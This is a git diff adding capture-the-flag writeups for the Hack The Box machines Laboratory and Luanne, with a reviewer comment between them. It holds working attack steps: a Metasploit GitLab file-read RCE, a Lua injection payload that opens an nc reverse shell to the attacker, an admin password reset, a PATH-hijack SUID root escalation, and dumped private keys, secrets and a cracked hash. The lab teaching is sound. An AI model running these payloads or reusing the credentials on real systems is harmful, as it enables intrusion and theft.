+ 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
+ -----END RSA PRIVATE KEY-----
+
+
+
+The part of the file we need here is the **secret_key_base** value.
+
+
+ **secret_key_base: 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3**
+
+
+
+Now that we have the secret key, we can basically leverage it to a Remote code execution, but instead of doing it manually, we're going to use metasploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → msfconsole
+
+ `:oDFo:`
+ ./ymM0dayMmy/.
+ -+dHJ5aGFyZGVyIQ==+-
+ `:sm⏣~~Destroy.No.Data~~s:`
+ -+h2~~Maintain.No.Persistence~~h+-
+ `:odNo2~~Above.All.Else.Do.No.Harm~~Ndo:`
+ ./etc/shadow.0days-Data'%20OR%201=1--.No.0MN8'/.
+ -++SecKCoin++e.AMd` `.-://///+hbove.913.ElsMNh+-
+ -~/.ssh/id_rsa.Des- `htN01UserWroteMe!-
+ :dopeAW.Noo :is:TЯiKC.sudo-.A:
+ :we're.all.alike'` The.PFYroy.No.D7:
+ :PLACEDRINKHERE!: yxp_cmdshell.Ab0:
+ :msf>exploit -j. :Ns.BOB&ALICEes7;:
+ :---srwxrwx:-.` `MS146.52.No.Per:
+ :<****script>.Ac816/ sENbove3101.404:
+ :NT_AUTHORITY.Do `T:/shSYSTEM-.N:
+ :09.14.2011.raid /STFU|wall.No.Pr:
+ :hevnsntSurb025N. dNVRGOING2GIVUUP:
+ :#OUTHOUSE- -s: /corykennedyData:
+ :$nmap -oS SSo.6178306Ence:
+ :Awsm.da: /shMTl#beats3o.No.:
+ :Ring0: `dDestRoyREXKC3ta/M:
+ :23d: sSETEC.ASTRONOMYist:
+ /- /yo- .ence.N:(){ :|: & };:
+ `:Shall.We.Play.A.Game?tron/
+ ```-ooy.if1ghtf0r+ehUser5`
+ ..th3.H1V3.U2VjRFNN.jMh+.`
+ `MjM~~WE.ARE.se~~MMjMs
+ +~KANSAS.CITY's~-`
+ J~HAKCERS~./.`
+ .esc:wq!:`
+ +++ATH`
+ `
+
+
+ =[ metasploit v6.0.46-dev ]
+ + -- --=[ 2135 exploits - 1139 auxiliary - 365 post ]
+ + -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ + -- --=[ 8 evasion ]
+
+ Metasploit tip: Use help to learn more
+ about any command
+
+ msf6 > search gitlab 12.8.1
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/multi/http/gitlab_file_read_rce 2020-03-26 excellent Yes GitLab File Read Remote Code Execution
+
+
+ Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/gitlab_file_read_rce
+
+ msf6 > use 0
+ [*] No payload configured, defaulting to generic/shell_reverse_tcp
+ msf6 exploit(multi/http/gitlab_file_read_rce) > show options
+
+
+
+Here we need to set the following options:
+
+
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set USERNAME test
+ USERNAME => test
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set PASSWORD testtest
+ PASSWORD => testtest
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set RHOSTS 10.10.10.216
+ RHOSTS => 10.10.10.216
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set VHOST git.laboratory.htb
+ VHOST => git.laboratory.htb
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set LHOST tun0
+ LHOST => tun0
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set SSL TRUE
+ [!] Changing the SSL option's value may require changing RPORT!
+ SSL => true
+ msf6 exploit(multi/http/gitlab_file_read_rce) > set RPORT 443
+ RPORT => 443
+
+
+
+
+Then we run the exploit:
+
+
+ msf6 exploit(multi/http/gitlab_file_read_rce) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.13:4444
+ [*] Executing automatic check (disable AutoCheck to override)
+ [+] The target appears to be vulnerable. GitLab 12.8.1 is a vulnerable version.
+ [*] Logged in to user test
+ [*] Created project /test/hPWfWdX6
+ [*] Created project /test/fh8BzMaY
+ [*] Created issue /test/hPWfWdX6/issues/1
+ [*] Executing arbitrary file load
+ [+] File saved as: '/home/nothing/.msf4/loot/20210605164827_default_10.10.10.216_gitlab.secrets_584759.txt'
+ [+] Extracted secret_key_base 3231f54b33e0c1ce998113c083528460153b19542a70173b4458a21e845ffa33cc45ca7486fc8ebb6b2727cc02feea4c3adbe2cc7b65003510e4031e164137b3
+ [*] NOTE: Setting the SECRET_KEY_BASE option with the above value will skip this arbitrary file read
+ [*] Attempting to delete project /test/hPWfWdX6
+ [*] Deleted project /test/hPWfWdX6
+ [*] Attempting to delete project /test/fh8BzMaY
+ [*] Deleted project /test/fh8BzMaY
+ [*] Command shell session 1 opened (10.10.14.13:4444 -> 10.10.10.216:34148) at 2021-06-05 16:48:32 +0200
+
+ id
+ uid=998(git) gid=998(git) groups=998(git)
+ ls
+ ls -lash
+ total 8.0K
+ 4.0K drwx------ 2 git root 4.0K Jul 2 2020 .
+ 4.0K drwxr-xr-x 9 git root 4.0K Jun 5 05:52 ..
+ pwd
+ /var/opt/gitlab/gitlab-rails/working
+
+
+
+And there you go! We managed to get a reverse shell as the git user, now that we're here we see that we are inside the gitlab-rails/working directory, so let's run the **gitlab-rails console** command to get more information on the users:
+
+
+ git@git:~/gitlab-rails/working$ gitlab-rails console
+ gitlab-rails console
+
+ --------------------------------------------------------------------------------
+ GitLab: 12.8.1 (d18b43a5f5a) FOSS
+ GitLab Shell: 11.0.0
+ PostgreSQL: 10.12
+ --------------------------------------------------------------------------------
+ Loading production environment (Rails 6.0.2)
+ Switch to inspect mode.
+
+
+From here we type the following:
+
+
+
+ **user = User.find(1)**
+ user = User.find(1)
+ #<****User id:1 @dexter>
+
+Let's change dexter's password:
+
+
+ **user.password = 'testtest'**
+ user.password = 'testtest'
+ "testtest"
+
+
+
+Then save it:
+
+
+ **user.save!**
+ user.save!
+ Enqueued ActionMailer::DeliveryJob (Job ID: 23a1f04b-e090-47e5-8e6f-8bc0a4f515e2) to Sidekiq(mailers) with arguments: "DeviseMailer", "password_change", "deliver_now", #<****GlobalID:0x00007fb1bf9c1d78 @uri=# <****URI::GID gid://gitlab/User/1>>
+ true
+
+Now that's done let's login as the dexter user:
+
+
+
+And we're logged in as the Dexter user!
+
+
+
+Now let's take a look at his SecureDocker project:
+
+
+
+And we found a private SSH key! let's use to to see if we can login via SSH:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → cat id_rsa
+ -----BEGIN OPENSSH PRIVATE KEY-----
+ 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
+ -----END OPENSSH PRIVATE KEY-----
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → chmod 600 id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Laboratory]
+ → ssh dexter@laboratory.htb -i id_rsa
+ The authenticity of host 'laboratory.htb (10.10.10.216)' can't be established.
+ ECDSA key fingerprint is SHA256:XexmI3GbFIB7qyVRFDIYvKcLfMA9pcV9LeIgJO5KQaA.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added 'laboratory.htb,10.10.10.216' (ECDSA) to the list of known hosts.
+ dexter@laboratory:~$ id
+ uid=1000(dexter) gid=1000(dexter) groups=1000(dexter)
+ dexter@laboratory:~$ ls
+ user.txt
+ dexter@laboratory:~$ cat user.txt
+ 73XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to log onto the box as the dexter user and print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the root user, let's get linpeas.sh on the box:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Laboratory]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term2]
+
+ dexter@laboratory:~$ which wget curl
+ /usr/bin/wget
+ /usr/bin/curl
+ dexter@laboratory:~$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh
+ --2021-06-05 15:08:55-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: ‘/tmp/peas.sh’
+
+ /tmp/peas.sh 100%[======================================================================================================================================================>] 333.85K --.-KB/s in 0.1s
+
+ 2021-06-05 15:08:55 (2.23 MB/s) - ‘/tmp/peas.sh’ saved [341863/341863]
+
+ dexter@laboratory:~$ chmod +x /tmp/peas.sh
+ dexter@laboratory:~$ /tmp/peas.sh
+
+
+
+` 
+
+Let it run, then scroll through the output, and you can see that there is a SUID binary in **/usr/local/bin/docker-security** :
+
+
+
+So let's make use of it:
+
+
+ dexter@laboratory:~$ echo "/bin/bash" > chmod
+ dexter@laboratory:~$ chmod +x chmod
+ dexter@laboratory:~$ export PATH=$PWD:$PATH
+ dexter@laboratory:~$ echo $PATH
+ /home/dexter:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/snap/bin
+ dexter@laboratory:~$ /usr/local/bin/docker-security
+ root@laboratory:~# id
+ uid=0(root) gid=0(root) groups=0(root),1000(dexter)
+ root@laboratory:~# cat /root/root.txt
+ 00XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
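Review bot: the root step at the end of this hunk (`echo "/bin/bash" > chmod`, `export PATH=$PWD:$PATH`, then `/usr/local/bin/docker-security`) is shown without any explanation of why it works; add a sentence that the SUID binary invokes `chmod` by bare name, so the first `chmod` found on PATH runs as root, which is also the lesson for defenders (SUID programs must call helpers by absolute path or reset PATH, and a SUID wrapper that shells out is a finding on its own). In the CVE-2020-10977 section, the two places that say the issue description "contains the following payload" are followed by an empty indented line, so the file-read payload did not survive the conversion and the step is not reproducible from the text; either paste the payload or keep only the screenshot reference. Terminology: the text calls the bug a "Local File Inclusion", but the searchsploit entries and the `gitlab_file_read_rce` module visible in the same hunk describe it as an arbitrary file read, which is the accurate term since nothing is included or executed by the server. Minor: "there is an [report]" should be "a report", and "let's use to to see" has a doubled word. Since the writeup itself says "The part of the file we need here is the secret_key_base value", the full secrets.yml dump (db_key_base, otp_key_base, and the whole openid_connect_signing_key RSA block) and the full id_rsa could be trimmed to the lines actually used, which would also make the document easier to review.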
diff --git a/Easy/54.md b/Easy/54.md
new file mode 100644
index 0000000..4c40ec6
--- /dev/null
+++ b/Easy/54.md
@@ -0,0 +1,528 @@
+# Luanne Writeup
+
+
+
+## Introduction :
+
+Luanne is an Easy NetBSD box released back in November 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → nmap -vvv -p- 10.10.10.218 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.218
+ Discovered open port 22/tcp on 10.10.10.218
+ Discovered open port 9001/tcp on 10.10.10.218
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → nmap -sCV -p80,22,9001 10.10.10.218
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-06 08:52 CEST
+ Nmap scan report for 10.10.10.218
+ Host is up (0.027s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
+ | ssh-hostkey:
+ | 3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
+ | 521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
+ |_ 256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
+ 80/tcp open http nginx 1.19.0
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=.
+ | http-robots.txt: 1 disallowed entry
+ |_/weather
+ |_http-server-header: nginx/1.19.0
+ |_http-title: 401 Unauthorized
+ 9001/tcp open http Medusa httpd 1.12 (Supervisor process manager)
+ | http-auth:
+ | HTTP/1.1 401 Unauthorized\x0D
+ |_ Basic realm=default
+ |_http-server-header: Medusa/1.12
+ |_http-title: Error response
+ Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 187.07 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+ 
+
+Here we don't have access yet, but we are hinted towards a certain local port 3000 that our nmap scan didn't pick up earlier. Now let's take a look at the Medusa service on port 9001:
+
+
+
+Now on the medusa service, we also have some basic auth with a different 401 response page. Not much here either, so let's move back to the port 80, on http-robots.txt there was the **./weather** directory disallowed entry, so let's run gobuster on it:
+
+
+ [ 10.0.0.10/16 ] [ /dev/pts/3 ] [~/HTB]
+ → gobuster dir -u http://10.10.10.218/weather/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.218/weather/
+ [+] Method: GET
+ [+] Threads: 50
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/06/06 09:11:55 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /forecast (Status: 200) [Size: 90]
+
+
+
+And here we get the **/weather/forecast/** page so let's investigate it:
+
+
+
+Here we see that we should have specified a city, so let's send intercept request into burpsuite and test if there are any injections we can do:
+
+ 
+
+Let's list the cities as advised:
+
+ 
+
+So we are able to get the weather data of any city. But we don't know yet if the city input is sanitized, so let's try to escape it to cause an error:
+
+
+
+And now we have more info! We managed to pickup the fact that this is a .lua file located in **/usr/local/webapi/weather.lua** , now let's try to poke at it further to see if we have any command execution, to do so we need to comment out the rest of the line using **\--**
+
+
+
+Now from here let's try to inject other commands after the **;**
+
+
+
+Now we have been able to inject another command! However let's go further and attempt to use system commands:
+
+
+
+And that's it! We have access to system commands, so let's spawn a reverse shell with it now:
+
+
+ #our first RCE
+ GET /weather/forecast?city=London');print("\nnihilist777\n");os.execute("id")-- HTTP/1.1
+
+ #RCE with reverse shell payload
+ GET /weather/forecast?city=London');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.13 9002 >/tmp/f")-- HTTP/1.1
+
+ #URL encoded reverse shell payload (just select it in burpsuite, and hit CTRL+U to URL-Encode)
+ GET /weather/forecast?city=London')%3bos.execute("rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.13+9002+>/tmp/f")-- HTTP/1.1
+
+ #prepare to catch the reverse shell with nc:
+ [ 10.10.14.13/23 ] [ /dev/pts/3 ] [~/HTB/Luanne]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+
+
+
+` 
+
+And we get a reverse shell connection!
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/27 ] [~/HTB/Luanne]
+ → nc -lvnp 9002
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.218] 65436
+ sh: can't access tty; job control turned off
+
+ $ id
+ uid=24(_httpd) gid=24(_httpd) groups=24(_httpd)
+
+ $ ls -lash
+ total 1.5K
+ 2.0K drwxr-xr-x 2 root wheel 512B Nov 25 2020 .
+ 2.0K drwxr-xr-x 24 root wheel 512B Nov 24 2020 ..
+ 2.0K -rw-r--r-- 1 root wheel 47B Sep 16 2020 .htpasswd
+ 2.0K -rw-r--r-- 1 root wheel 386B Sep 17 2020 index.html
+ 2.0K -rw-r--r-- 1 root wheel 78B Nov 25 2020 robots.txt
+
+
+Running a simple ls shows us that there's a **.htpasswd** file, so let's get it:
+
+
+ $ cat .htpasswd
+ webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+
+
+Let's crack the hash using john locally:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → vim htpasswd.hash
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → hash-identifier
+ #########################################################################
+ # __ __ __ ______ _____ #
+ # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
+ # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
+ # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
+ # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
+ # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
+ # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
+ # By Zion3R #
+ # www.Blackploit.com #
+ # Root@Blackploit.com #
+ #########################################################################
+ --------------------------------------------------
+ HASH: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+ Possible Hashs:
+ [+] MD5(Unix)
+ --------------------------------------------------
+ HASH: ^C
+
+ Bye!
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → cat htpasswd.hash
+ $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
+
+ [ 10.10.14.13/23 ] [ /dev/pts/25 ] [~/HTB/Luanne]
+ → john htpasswd.hash -w=/usr/share/wordlists/rockyou.txt
+ Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
+ Use the "--format=md5crypt-long" option to force loading these as that type instead
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
+ Will run 4 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ **iamthebest (?)**
